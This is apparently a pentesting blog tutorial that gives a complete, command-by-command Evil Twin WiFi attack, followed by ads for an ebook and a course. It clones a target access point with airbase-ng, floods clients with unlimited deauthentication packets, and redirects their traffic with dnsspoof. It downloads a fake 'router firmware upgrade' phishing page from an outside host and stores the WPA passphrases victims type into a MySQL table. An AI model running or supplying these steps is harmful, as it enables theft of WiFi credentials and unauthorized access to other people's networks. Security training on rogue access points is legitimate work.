“A Fake WiFi access point is a wireless access point that has been installed on a secure network without explicit authorization from a local network administrator, whether added by a well-meaning employee or by a malicious attacker.” – Wikipedia
Fake WiFi access point is often called as:
- Rogue access point, or
- Evil Twin attack access point
Using this method it is possible to retrieve the WPA/2 passphrase in clear-text within minutes. No need of cracking or any extra hardware other than a Wireless adapter.
In some cases you don’t even need an adapter. When ? that we will discuss
Keep reading…
There were some conflicts between aircrack-ng suite and network manager, So I have to make changes in the chapter to keep it up-to-date.
We will not be using any automated script as thought earlier, but we will understand the concept and perform it manually so that you can make your own script to automate the task and make it simple and fast to use.
Lets begin now!
If you don’t have time to read this complete guide
Then you should download the Kali Linux Wireless Pentesting and Security eBook.It includes this chapter and a lot more sophisticated WiFi attacks. You learn pentesting wireless networks from scratch, create Rogue Access Points, Ultimate Evil Twins, Honepots, and hack Cleartext WPA2 Passphrases on the go.
Download Complete PDF
Evil Twin Attack Methodology
Step 1: We will first scan the air for a target access point. Then create an access point using airbase-ng with the same name and channel of the target access point, hence Evil TWIN attack.
Step 2:The client is now disconnected repeatedly from the original access point and as most modern system’s setting says… “Connect back to same ESSID (AP name) if disconnects”.
This also happens because when the client disconnects from any access point it starts sending probe requests in the air with the name of the access point it connected to earlier. Hence BSSID isn’t a barrier, you just need ESSID to spoof the AP
Step 3: Clients is now connected to the Evil Twin access point and now client may start browsing Internet.
Step 4: Client will see a web administrator warning saying “Enter WPA password to download and upgrade the router firmware”
Step 5: The moment client enters the password, s/he will be redirected to a loading page and the password will be stored in the MySQL database of the attacker machine.
Scanning the air for client probe requests can lead you to crack WPA2-PSK passphrase without any existing Access point or sometimes without any handshake.
Hardware used:
- A Laptop (4GB RAM, Intel i5 processor)
- Alfa AWUS036NH 1W wireless adapter
- Huawei 3G WiFi dongle for Internet connection to the Kali Virtual Machine
Software Used:
- VMware workstation 12
- Kali Linux 2018 (Attacker)
- Airmon-ng, airodump-ng, airbase-ng, and aireplay-ng
- DNSmasq
- Iptables
- Apache, mysql
- Firefox web browser on Ubuntu 16.10 (Victim)
Installing required tools
So far we have aircrack-ng suite of tools, apache, mysql, iptables pre-installed in our Kali Linux virtual machine.
We just need to install dnsmasq for IP address allocation to the client.
Install dnsmasq in Kali Linux
Type in terminal:
apt-get update apt-get install dnsmasq -y
This will update the cache and install latest version of dhcp server in your Kali Linux box.
Now all the required tools are installed. We need to configure apache and the dhcp server so that the access point will allocate IP address to the client/victim and client would be able to access our webpage remotely.
Now we will define the IP range and the subnet mask for the dhcp server.
Configure dnsmasq
Create a configuration file for dnsmasq using vim or your favourite text editor.
sudo vi ~/Desktop/dnsmasq.conf
Add following code.
interface=<at0>
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
Save and exit.
.conf file.
Parameter Breakdown:
dhcp-range=10.0.0.10,10.0.0.250,12h: Client IP address will range from 10.0.0.10 to 10.0.0.250 and default lease time is 12 hours. dhcp-option=3,10.0.0.1: 3 is code for Default Gateway followed by IP of D.G i.e. 10.0.0.1 dhcp-option=6,10.0.0.1: 6 for DNS Server followed by IP address
That’s all for configuration. Simple, isn’t it?
(Optional) Resolve airmon-ng and Network Manager Conflict
Before enabling monitor mode on the wireless card let’s fix the airmon-ng and network-manager conflict forever.
So that we don’t need to kill the network-manager or disconnect tany network connection before putting wireless adapter into monitor mode as we used to run airmon-ng check kill every time we need to start wifi pentest.
Open network manager’s configuration file and put the MAC address of the device you want network-manager to stop managing:
vim /etc/NetworkManager/NetworkManager.conf
Now add the following at the end of the file
[keyfile] unmanaged-devices:mac=AA:BB:CC:DD:EE:FF, A2:B2:C2:D2:E2:F2
Now that you have edited the NetworkManager.conf file you should have no conflicts with airmon-ng in Kali Linu
We are ready to begin now.
Bring up the wireless interface
ifconfig wlan1 up #Your could be wlan0, wlan2 etc
Put wireless adapter into monitor mode
airmon-ng start wlan1
Putting the card in monitor mode will show a similar output
Now our card is in monitor mode without any issues with network manager. You can simply start monitoring the air with command
airodump-ng wlan1mon
As soon your target AP appears in the airodump-ng output window press
Set tx-power of alfa card to max: 1000mW
tx-power stands for transmission power. By default it is set to 20dBm(Decibel metre) or 100mW.
tx-power in mW increases 10 times with every 10 dBm. See the dBm to mW table.
If your country is set to US while installation. most probably your card should operate on 30 dBm(1000 mW)
In Kali Linux 2.0 (Codename: Sana) You might face issue while powering up your card.
As in earlier versions if you set country(region) to Bolivia, you are able to operate card at 30 dBm. But in Kali Sana is not working. So we’ll be using US as our region. Here is how
ifconfig wlan1mon down #Bring down the interface iw reg set US #Set region to be US ifconfig wlan1mon up #Bring the interface up iwconfig wlan1mon #Check tx-power, should be 30 dBm
If you are thinking why we need to change region to operate our card at 1000mW. Here is why
because different countries have different legal allowance of Wireless devices at certain power and frequency. That is why Linux distribution have this information built in and you need to change your region to allow yourself to operate at that frequency and power.
Motive of powering up the card is that when creating the hotspot you do not have any need to be near to the victim. victim device will automatically connect to the device with higher signal strength even if it isn’t physically near.
Start Evil Twin Attack
Begin the Evil Twin attack using airbase-ng:
airbase-ng -e "rootsh3ll" -c 1 wlan1mon
by default airbase-ng creates a tap interface(at0) as the wired interface for bridging/routing the network traffic via the rogue access point. you can see it using ifconfig at0 command.
For the at0 to allocate IP address we need to assign an IP range to itself first.
Allocate IP and Subnet Mask
ifconfig at0 10.0.0.1 up
Now we will use our default Internet facing interface, eth0, to route all the traffic from the client through it.
In other words, allowing victim to access the internet and allowing ourselves(attacker) to sniff that traffic.
For that we will use iptables utility to set a firewall rule to route all the traffic through at0 exclusively.
You will get a similar output, if using VM
Enable NAT by setting Firewall rules in iptables
Enter the following commands to set-up an actual NAT:
iptables --flush iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface at0 -j ACCEPT
Make sure you enter correct interface for –out-interface. eth0 here is the upstream interface where we want to send out packets, coming from at0 interface(rogue AP). Rest is fine.
After entering the above command if you are willing to provide Internet access to the victim just enable routing using the command below
Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
Entering “1” in the ip_forward file will tell the system to enable the rules defined in the IPtables and start forwarding traffic(if any). 0 stand for disable. Although rules will remain defined until next reboot.
We will put it 0 for this attack, as we are not providing internet access before we get the WPA password.
Our Evil Twin attack is now ready and rules has been enabled, now we will start the dhcp server to allow fake AP to allocate IP address to the clients.
First we need to tell dhcp server the location of the file we created earlier, which defines IP class, subnet mask and range of the network.
Start dhcpd Listener
Type in terminal:
dnsmasq -C ~/Desktop/dnsmasq.conf -d
Here -C stands for Configuration file and -d stands for daemon mode
as soon as victim connects you should see similar output for dnsmasq Terminal window
dnsmasq: started, version 2.76 cachesize 150 dnsmasq: compile time options: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack ipset auth DNSSEC loop-detect inotify dnsmasq-dhcp: DHCP, IP range 10.0.0.10 -- 10.0.0.250, lease time 12h dnsmasq: using nameserver 8.8.8.8#53 dnsmasq: reading /etc/resolv.conf dnsmasq: using nameserver 8.8.8.8#53 dnsmasq: using nameserver 192.168.74.2#53 dnsmasq: read /etc/hosts - 5 addresses dnsmasq-dhcp: 1673205542 available DHCP range: 10.0.0.10 -- 10.0.0.250 dnsmasq-dhcp: 1673205542 client provides name: rootsh3ll-iPhone dnsmasq-dhcp: 1673205542 DHCPDISCOVER(at0) 2c:33:61:3d:c4:2e dnsmasq-dhcp: 1673205542 tags: at0 dnsmasq-dhcp: 1673205542 DHCPOFFER(at0) 10.0.0.247 2c:33:61:3a:c4:2f dnsmasq-dhcp: 1673205542 requested options: 1:netmask, 121:classless-static-route, 3:router, <-----------------------------------------SNIP-----------------------------------------> dnsmasq-dhcp: 1673205542 available DHCP range: 10.0.0.10 -- 10.0.0.250
In case you are facing any issue regarding dhcp server, just kill the curently running dhcp processes
killall dnsmasq dhcpd isc-dhcp-server
and run dnsmasq again. It should work now.
Start the Services
Now start the dhcp server, apache and mysql inline
/etc/init.d/apache2 start /etc/init.d/mysql start
We have our Evil Twin attack vector up and working perfectly. Now we need to setup our fake webpage in action so that victim will see the webpage while browsing and enter the passphrase which s/he uses for his/her access point.
Download Rogue AP Configuration Files
wget https://cdn.rootsh3ll.com/u/20180724181033/Rogue_AP.zip
and simply enter the following command in Terminal
unzip rogue_AP.zip -d /var/www/html/
This command will extract the contents of rogue_AP.zip file and copy them to the apache’s html directory so that when the victim opens the browser s/he will automatically be redirected to the default index.html webpage.
Now to store the credentials entered by the victim in the html page, we need an SQL database.
you will see a dbconnect.php file for that, but to be in effect you need a database created already so that the dbconnect.php will reflect the changes in the DB.
Open terminal and type:
- mysql -u root -p
Create a new user fakeap and password fakeap
As you cannot execute MySQL queries from PHP being a root user since version 5.7
- create user fakeap@localhost identified by 'fakeap';
now create database and table as defined in the dbconnect.php
- create database rogue_AP;
- use rogue_AP;
- create table wpa_keys(password1 varchar(32), password2 varchar(32));
It should go like this:
Grant fakeap all the permissions on rogue_AP Database:
- grant all privileges on rogue_AP.* to 'fakeap'@'localhost';
Exit and log in using new user
- mysql -u fakeap -p
Select rogue_AP database
- use rogue_AP;
Insert a test value in the table
- insert into wpa_keys(password1, password2) values ("testpass", "testpass");
- select * from wpa_keys;
Note that both the values are same here, that means password and confirmation password should be the same.
Our attack is now ready just wait for the client to connect and see the credential coming.
In some cases your client might already be connected to the original AP. You need to disconnect the client as we did in the previous chapters using aireplay-ng utility.
Syntax: aireplay-ng --deauth 0 -a <BSSID> <Interface>
aireplay-ng --deauth 0 -a FC:DD:55:08:4F:C2 wlan1mon
--deauth 0: Unlimited de-authentication requests. Limit the request by entering natural numbers.
We are using 0 so that every client will disconnect from that specific BSSID and connect to our AP as it is of the same name as of real AP and also open type access point.
As soon a client connects to your AP you will see an activity in the airbase-ng terminal window like this
Now to simulate the client side I am using Ubuntu machine connected via WiFi and using a Firefox web browser to illustrate the attack.
Victim can now access the Internet. You can do 2 things at this staged:
- Sniff the client traffic
- Redirect all the traffic to the fake AP page
and that’s what we wanna do. Redirect the client to our fake AP page.
Just run this command:
dnsspoof -i at0
It will redirect all HTTP traffic coming from the at0 interface.
Not HTTPS traffic, due to the built in list of HSTS web sites. You can’t redirect HTPS traffic without getting an SSL/TLS error on the victim’s machine.
When victim tries to access any website(google.com in this case), s/he will see this page which tell the victim to enter the password to download and upgrade the firmware
Here i am entering “iamrootsh3ll” as the password that I (Victim) think is his/her AP’s password.
As soon as the victim presses [ENTER] s/he will see this
Now coming back to attacker side. You need to check in the mySQL database for the stored passwords.
Just type the previously used command in the mySQL terminal window and see whether a new update is there or not.
After simulating I checked the mySQL DB and here is the output
Voila! you have successfully harvested the WPA2 passphrase, right from the victim, in plain text.
Now close all the terminal windows and connect back to the real AP to check whether the password is correct or victim was him/herself was a hacker and tricked you!
Although you don’t need to name any AP similar to an existing AP you can also create a random free open WiFi type name to gather the client on your AP and start pentesting.
If you don’t have time to read this complete guide
Then you should download the Kali Linux Wireless Pentesting and Security eBook.It includes this chapter and a lot more sophisticated WiFi attacks. You learn pentesting wireless networks from scratch, create Rogue Access Points, Ultimate Evil Twins, Honepots, and hack Cleartext WPA2 Passphrases on the go.
Click Here to Download All 10 Chapters
Want to go even deeper? If you are serious about WiFi Penetration Testing and Security, I have something for you.
WiFi Hacking in the Cloud Video Course. Which will take you from a complete beginner to a full blown blue teamer who can not only pentest a WiFi network but can also detect rogue devices on a network, detect network anomalies, perform threat detection on multiple networks at once, create email reports, visual dashboard for easier understanding, incident handling and respond to the Security Operations Center.
Apart from that,
USP of the course?
WiFi Hacking without a WiFi card – A.K.A The Cloud Labs
The cloud labs allows you to simply log into your Kali machine and start sniffing WiFi traffic. perform low and high level WiFi attacks, learn all about WiFi security, completely on your lab.
Labs can be accessed in 2 ways
1. Via Browser – Just use your login link and password associated
2. Via SSH -If you want even faster and latency free experience.
Here’s a screenshot of the GUI lab running in Chrome browser (Note the URL, it’s running on Amazon AWS cloud):
Keep Learning…